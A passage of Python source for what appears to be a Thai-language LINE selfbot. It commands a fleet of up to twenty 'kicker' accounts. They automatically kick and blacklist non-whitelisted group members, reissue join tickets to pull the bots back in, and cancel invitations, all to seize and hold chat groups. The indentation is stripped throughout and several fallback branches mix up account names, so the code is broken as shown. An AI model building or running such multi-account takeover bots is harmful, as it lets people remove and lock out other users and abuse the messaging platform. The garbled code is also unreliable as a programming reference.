for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid == myMid:
continue
try:
line.kickoutFromGroup(to, [mid])
line.findAndAddContactsByMid(mid)
line.inviteIntoGroup(to, [mid])
line.cancelGroupInvitation(to, [mid])
except TalkException as talk_error:
return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nเนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
line.sendMessage(to, 'เตะสมาชิกเรียบร้อย\nจำนวน %i คน' % len(mentions['MENTIONEES']))
else:
line.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nกรุณาแท็กคนที่จะเตะ')
def executeOp(op):
try:
print ('[* %i ] %s' % (op.type, OpType._VALUES_TO_NAMES[op.type].replace('_', ' ')))
if op.type == 5:
if settings['autoAdd']['status']:
line.findAndAddContactsByMid(op.param1)
if settings['autoAdd']['reply']:
if '@!' not in settings['autoAdd']['message']:
line.sendMessage(op.param1, settings['autoAdd']['message'])
else:
line.sendMentionV2(op.param1, settings['autoAdd']['message'], [op.param1])
if op.type == 13:
if settings['autoJoin']['status'] and myMid in op.param3:
line.acceptGroupInvitation(op.param1)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(op.param1, settings['autoJoin']['message'])
else:
line.sendMentionV2(op.param1, settings['autoJoin']['message'], [op.param2])
if op.type == 15:
if settings['greet']['leave']['status']:
if '@!' not in settings['greet']['leave']['message']:
line.sendMessage(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name))
else:
line.sendMentionV2(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
if op.type == 17:
if settings['greet']['join']['status']:
if '@!' not in settings['greet']['join']['message']:
line.sendMessage(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name))
else:
line.sendMentionV2(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
if op.type == 11:
if op.param1 in protectqr:
try:
if line.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).reissueGroupTicket(op.param1)
X = line.getGroup(op.param1)
X.preventedJoinByTicket = True
random.choice(ABC).updateGroup(X)
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
invitor = op.param2
gotinvite = []
if "\x1e" in op.param3:
gotinvite = op.param3.split("\x1e")
else:
gotinvite.append(op.param3)
for u in gotinvite:
wait["blacklist"][op.param2] = True
kicker.cancelGroupInvitation(op.param1,[op.param3])
kicker.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker2.cancelGroupInvitation(op.param1,[op.param3])
kicker2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker3.cancelGroupInvitation(op.param1,[op.param3])
kicker3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker4.cancelGroupInvitation(op.param1,[op.param3])
kicker4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker5.cancelGroupInvitation(op.param1,[op.param3])
kicker5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker6.cancelGroupInvitation(op.param1,[op.param3])
kicker6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker7.cancelGroupInvitation(op.param1,[op.param3])
kicker7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker8.cancelGroupInvitation(op.param1,[op.param3])
kicker8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker9.cancelGroupInvitation(op.param1,[op.param3])
kicker9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker10.cancelGroupInvitation(op.param1,[op.param3])
kicker10.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 13:
if op.param3 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 32:
if op.param1 in protectcanceljs:
if op.param3 in Bots:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
line.inviteIntoGroup(op.param1,[g1MID])
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
except:
pass
return
if op.type == 32:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
pass
if op.param1 in protectcancel:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
kicker.findAndAddContactsByMid(op.param3)
kicker.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 17:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 17:
if op.param1 in protecARoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
#================================================================================
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = line.getGroup(op.param1)
G.preventedJoinByTicket = False
random.choice(ABC).updateGroup(G)
invsend = 0
Ticket = random.choice(ABC).reissueGroupTicket(op.param1)
g1.acceptGroupInvitationByTicket(op.param1,Ticket)
g1.kickoutFromGroup(op.param1,[op.param2])
X = line.getGroup(op.param1)
X.preventedJoinByTicket = True
random.choice(ABC).updateGroup(X)
if op.type == 19:
if op.param1 in protectantijs:
if myMid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
g1.acceptGroupInvitation(op.param1)
g1.inviteIntoGroup(op.param1,[myMid])
g1.kickoutFromGroup(op.param1,[op.param2])
line.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
g1.leaveGroup(op.param1)
line.inviteIntoGroup(op.param1,[Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID])
except:
pass
if op.type == 19:
if myMid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
pass
return
if Dmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
